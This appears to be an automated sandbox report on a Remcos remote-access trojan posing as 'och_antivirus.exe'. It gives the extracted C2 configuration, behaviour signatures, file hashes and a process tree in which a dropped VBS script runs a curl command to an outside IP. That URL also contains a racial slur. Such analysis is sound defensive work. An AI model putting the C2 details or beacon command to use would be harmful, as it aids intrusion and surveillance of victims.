Analysis

  • max time kernel
    141s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-04-2024 11:57

General

  • Target

    och_antivirus.exe

  • Size

    17.0MB

  • MD5

    41d3613c3bd70904c8ed605bed978987

  • SHA1

    8a44183362dc9dd222cb92b0e0a33b7eb3bc2c34

  • SHA256

    69b943efb0b8f871b591ce1994bae3e550701a209f79c4d31e2451a69771b166

  • SHA512

    bb80f240d675a3c8b0b756f9609bd146faa77bd1c4f23dd0a63825405166908af8aff621e2510e5f67a41e4ea181201ae50a000a3b5bc5ef68dd4806532172b1

  • SSDEEP

    196608:H0bq45mXYPrOLaw1alaHwSiLPpizFNwR3LZBh51ZC1uBaPENjZZ:Ubq4oojOLahLhr9dDZwujL

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

178.33.57.155:443

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PM1AI7

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 13 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\och_antivirus.exe
    "C:\Users\Admin\AppData\Local\Temp\och_antivirus.exe"
    1⤵
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4600
    • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptSrv.exe
      C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptSrv.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Users\Admin\AppData\Roaming\readermonitor_test_3\ptSrv.exe
        C:\Users\Admin\AppData\Roaming\readermonitor_test_3\ptSrv.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\SysWOW64\cmd.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1172
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            5⤵
            • Drops file in System32 directory
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:1720
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
              6⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:4792
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2132
                • C:\Windows\SysWOW64\curl.exe
                  curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO
                  8⤵
                    PID:3852
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\nihqlluvaxjcqgzkvtkrjgagmgkuam.vbs"
                6⤵
                  PID:1900

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\6aaf70f6

        Filesize

        5.4MB

        MD5

        045bb8ad2f52ecd9dd9a98c091a8104e

        SHA1

        5047bf498dad1537f2308cc03e090a6b43f64ccd

        SHA256

        ad0710db7f86bf4c43b98437ef1da37ac0f246658e6bb426bc6e4cb7a813ccd0

        SHA512

        ec0df109f03508c6662f32bab28a2d6c58d052f3303bb3b521d6b993453320fffd64194d60340354e299a850bfed87ea8588a4f2f495c7908948309528b4bde2

      • C:\Users\Admin\AppData\Local\Temp\7746d2f6

        Filesize

        1.2MB

        MD5

        ec23407f1e09987b36550d5b2ebff6d9

        SHA1

        c462cdf2a3fe50e2bedae7c8b92b4961dbb1276a

        SHA256

        3ecb2ee304aebc28894984a1704a16d80efdf0b15810272179115b58078faf3c

        SHA512

        883fdd28a47053218b045755e3d1c1dc3334cf7f4a9735f00df2f6d9211816165779ec96ec63137746abc7cc39f4dbf2c03f6b8a5c0c5d8c642f6ef2690de473

      • C:\Users\Admin\AppData\Local\Temp\check1.vbs

        Filesize

        146B

        MD5

        85a2ebad40c21ba1da77230265b5351f

        SHA1

        803822e08837ebda5de7dde963e4872ae2fc4c21

        SHA256

        b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9

        SHA512

        77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a

      • C:\Users\Admin\AppData\Local\Temp\nihqlluvaxjcqgzkvtkrjgagmgkuam.vbs

        Filesize

        324B

        MD5

        5969db124f530f24b0e1b305ca5a8291

        SHA1

        5eb79a70cc356a20ba39913489a5cdca36f83011

        SHA256

        3a4ae3a89b9c1d79fbef06dd969b1307837c0378966c5f7ceddafb1e4660a072

        SHA512

        0297ea245560c1b5fe64f5a3cd7769ea4e9f09dfc4cc4f16c8d96c5b5d846c8982458991aa143ea5a103436a03c5e7d5b7769b2b87bca5565e856de960e2e290

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\MSVCP140.dll

        Filesize

        427KB

        MD5

        71a0aa2d05e9174cefd568347bd9c70f

        SHA1

        cb9247a0fa59e47f72df7d1752424b33a903bbb2

        SHA256

        fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47

        SHA512

        6e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\VCRUNTIME140.dll

        Filesize

        81KB

        MD5

        16b26bc43943531d7d7e379632ed4e63

        SHA1

        565287de39649e59e653a3612478c2186096d70a

        SHA256

        346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517

        SHA512

        b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\WCLDll.dll

        Filesize

        590KB

        MD5

        b3e030ab715a02f8864a79f552a247b7

        SHA1

        4b1c18370b6e8a69c5f8b3ff543375f74e6e58fa

        SHA256

        2a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955

        SHA512

        cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\audiovisual.psd

        Filesize

        1.0MB

        MD5

        c08c443520df3d30875ddc0e718f3346

        SHA1

        ff9ac03414433f597f58dce45dca0eb16d522964

        SHA256

        a22a7cecd7605ba16418b32079fe856ce4dc923b894986a472963aeb0fc0c6e1

        SHA512

        bf60ba1ee45f4f55851eb946d34bcd992379245e2ac7bd6da5e5c2bfc296b25ae88918d50d941710121028bfb8f9e32797ba6c885524bcc37426898b2ada1858

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\cyclopedia.html

        Filesize

        28KB

        MD5

        db3f3969e8a2f913fe3643d8465171b1

        SHA1

        736095ea1e02547a6df2586fffdbf31bb7d23656

        SHA256

        c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043

        SHA512

        0a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptMgr.dll

        Filesize

        2.5MB

        MD5

        2087eb2d3fb639933ebe0a0614fd5218

        SHA1

        c1a1b75c8e76e000b7045092bd11100904a72840

        SHA256

        725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f

        SHA512

        3390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptSrv.exe

        Filesize

        202KB

        MD5

        64179e64675e822559cac6652298bdfc

        SHA1

        cceed3b2441146762512918af7bf7f89fb055583

        SHA256

        c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9

        SHA512

        ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptusredt.dll

        Filesize

        165KB

        MD5

        3c3e960d59cb413791fee1e944b6df72

        SHA1

        4aa6c90d81692642ca8266bf0d8e249ff3e3ad54

        SHA256

        88378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67

        SHA512

        85b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac

      • C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\wbxtrace.dll

        Filesize

        103KB

        MD5

        c2b06a78b6c07a1371b6aed1dbf4fc37

        SHA1

        b8847693e7cd3637b1b400e71430cdf629de2e64

        SHA256

        9e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04

        SHA512

        219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411

      • memory/1020-73-0x00007FFD20230000-0x00007FFD20425000-memory.dmp

        Filesize

        2.0MB

      • memory/1020-72-0x0000000074390000-0x000000007450B000-memory.dmp

        Filesize

        1.5MB

      • memory/1020-74-0x0000000074390000-0x000000007450B000-memory.dmp

        Filesize

        1.5MB

      • memory/1020-76-0x0000000074390000-0x000000007450B000-memory.dmp

        Filesize

        1.5MB

      • memory/1172-78-0x0000000074390000-0x000000007450B000-memory.dmp

        Filesize

        1.5MB

      • memory/1172-86-0x0000000074390000-0x000000007450B000-memory.dmp

        Filesize

        1.5MB

      • memory/1172-84-0x0000000074390000-0x000000007450B000-memory.dmp

        Filesize

        1.5MB

      • memory/1172-83-0x0000000074390000-0x000000007450B000-memory.dmp

        Filesize

        1.5MB

      • memory/1172-80-0x00007FFD20230000-0x00007FFD20425000-memory.dmp

        Filesize

        2.0MB

      • memory/1720-95-0x0000000000400000-0x0000000000484000-memory.dmp

        Filesize

        528KB

      • memory/1720-90-0x0000000000F60000-0x0000000001393000-memory.dmp

        Filesize

        4.2MB

      • memory/1720-102-0x0000000000400000-0x0000000000484000-memory.dmp

        Filesize

        528KB

      • memory/1720-98-0x0000000000400000-0x0000000000484000-memory.dmp

        Filesize

        528KB

      • memory/1720-97-0x0000000000400000-0x0000000000484000-memory.dmp

        Filesize

        528KB

      • memory/1720-96-0x0000000000400000-0x0000000000484000-memory.dmp

        Filesize

        528KB

      • memory/1720-87-0x00007FFD20230000-0x00007FFD20425000-memory.dmp

        Filesize

        2.0MB

      • memory/1720-88-0x0000000000400000-0x0000000000484000-memory.dmp

        Filesize

        528KB

      • memory/2140-45-0x00007FFD20230000-0x00007FFD20425000-memory.dmp

        Filesize

        2.0MB

      • memory/2140-44-0x0000000074390000-0x000000007450B000-memory.dmp

        Filesize

        1.5MB

      • memory/4600-8-0x00007FFD01FF0000-0x00007FFD02162000-memory.dmp

        Filesize

        1.4MB

      • memory/4600-26-0x00007FFD01FF0000-0x00007FFD02162000-memory.dmp

        Filesize

        1.4MB

      • memory/4600-9-0x00007FFD01FF0000-0x00007FFD02162000-memory.dmp

        Filesize

        1.4MB

      • memory/4600-0-0x00007FF72C590000-0x00007FF72D6A9000-memory.dmp

        Filesize

        17.1MB

      • memory/4600-75-0x00007FFD01FF0000-0x00007FFD02162000-memory.dmp

        Filesize

        1.4MB

      • memory/4600-6-0x00007FFD01FF0000-0x00007FFD02162000-memory.dmp

        Filesize

        1.4MB